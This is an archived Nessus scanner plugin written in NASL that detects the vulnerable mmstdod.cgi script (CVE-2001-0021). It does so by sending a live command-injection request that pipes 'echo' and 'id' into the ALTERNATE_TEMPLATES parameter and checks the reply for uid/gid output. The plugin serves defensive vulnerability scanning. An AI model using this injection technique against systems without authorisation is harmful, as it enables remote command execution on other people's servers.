home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / mailman_webmail.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  82 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10566);
  10.  script_bugtraq_id(2063);
  11.  script_cve_id("CVE-2001-0021");
  12.  script_version ("$Revision: 1.13 $");
  13.  
  14.  name["english"] = "mmstdod.cgi";
  15.  name["francais"] = "mmstdod.cgi";
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "The 'mmstdod.cgi' cgi is installed. This CGI has
  19. a well known security flaw that lets anyone execute arbitrary
  20. commands with the privileges of the http daemon (root or nobody).
  21.  
  22. Solution : Delete the file or upgrade to version 3.0.26
  23.  
  24. Risk factor : High";
  25.  
  26.  
  27.  desc["francais"] = "Le cgi 'mmstdod.cgu' est installΘ. Celui-ci possΦde
  28. un problΦme de sΘcuritΘ bien connu qui permet α n'importe qui de faire
  29. executer des commandes arbitraires au daemon http, avec les privilΦges
  30. de celui-ci (root ou nobody). 
  31.  
  32. Solution : retirez-le ou bien mettez-le α jour en veresion 3.0.26
  33.  
  34. Facteur de risque : SΘrieux";
  35.  
  36.  
  37.  script_description(english:desc["english"], francais:desc["francais"]);
  38.  
  39.  summary["english"] = "Checks for the presence of /cgi-bin/mmstdod.cgi";
  40.  summary["francais"] = "VΘrifie la prΘsence de /cgi-bin/mmstdod.cgi";
  41.  
  42.  script_summary(english:summary["english"], francais:summary["francais"]);
  43.  
  44.  script_category(ACT_GATHER_INFO);
  45.  
  46.  
  47.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  48.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  49.  family["english"] = "CGI abuses";
  50.  family["francais"] = "Abus de CGI";
  51.  script_family(english:family["english"], francais:family["francais"]);
  52.  script_dependencie("find_service.nes", "no404.nasl");
  53.  script_require_ports("Services/www", 80);
  54.  exit(0);
  55. }
  56.  
  57. #
  58. # The script code starts here
  59. #
  60.  
  61. include("http_func.inc");
  62. include("http_keepalive.inc");
  63.  
  64. port = get_http_port(default:80);
  65.  
  66. if(!get_port_state(port))exit(0);
  67.  
  68. foreach dir (cgi_dirs())
  69. {
  70. req = string(dir, "/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20", raw_string(0x22), 
  71.                       "Content-Type:%20text%2Fhtml", raw_string(0x22), 
  72.                  "%3Becho%20",
  73.                  raw_string(0x22, 0x22),
  74.                  "%20%3B%20id%00");
  75.                  
  76. req = http_get(item:req, port:port);                 
  77. r = http_keepalive_send_recv(port:port, data:req);
  78. if ( r == NULL ) exit(0);
  79. if(("uid=" >< r) && ("gid=" >< r))
  80.      security_hole(port);
  81. }
  82.